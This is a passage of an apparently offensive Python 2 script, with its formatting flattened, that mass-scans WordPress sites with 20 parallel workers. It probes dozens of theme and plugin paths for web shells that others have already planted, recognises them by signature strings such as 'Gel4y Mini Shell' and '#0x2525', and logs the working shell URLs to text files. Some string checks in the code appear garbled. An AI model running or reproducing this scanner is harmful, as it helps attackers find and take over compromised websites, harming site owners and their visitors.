if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-includes/certificates/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/includes/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-admin/includes/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/IXR/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-includes/IXR/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/lo.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Real Shit' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('lo.txt', 'a').write(url + '/lo.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/cong.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('cong.txt', 'a').write(url + '/cong.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/ioptimization/IOptimize.php?rchk',headers=headers, allow_redirects=True,timeout=15) if 'type="file"> {}[Succefully]'.format(fg) open('IOptimize.txt', 'a').write(url + '/wp-content/plugins/ioptimization/IOptimize.php?rchk\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/defaults.php#yt9',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('defaults.txt', 'a').write(url + '/defaults.php#yt9\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/three-column-screen-layout/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/plugins/three-column-screen-layout/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/seotheme/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/linkpreview/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/plugins/linkpreview/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/gaukingo/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/gaukingo/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/plugins/seoplugins/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/pridmag/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/pridmag/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/calliope/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/calliope/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/chigue/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/chigue/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/chihua/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/chihua/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/dinan/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/dinan/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/dunag/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/dunag/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/dunag/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/dunag/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/gom-preum/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/gom-preum/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/king/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/king/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/news-box-lite/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/news-box-lite/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/prid/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/prid/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/shunar/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/shunar/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/trexo/db.php?u',headers=headers, allow_redirects=True,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('db.txt', 'a').write(url + '/wp-content/themes/trexo/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"> {}[Succefully]'.format(fg) open('about.txt', 'a').write(url + '/admin.php?520\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/admin.php?520',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'input type="password" name="pass" > {}[Succefully]'.format(fg) open('about.txt', 'a').write(url + '/wp-content/admin.php?520\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/style.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if ':200400,' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('style.txt', 'a').write(url + '/style.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(20) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc)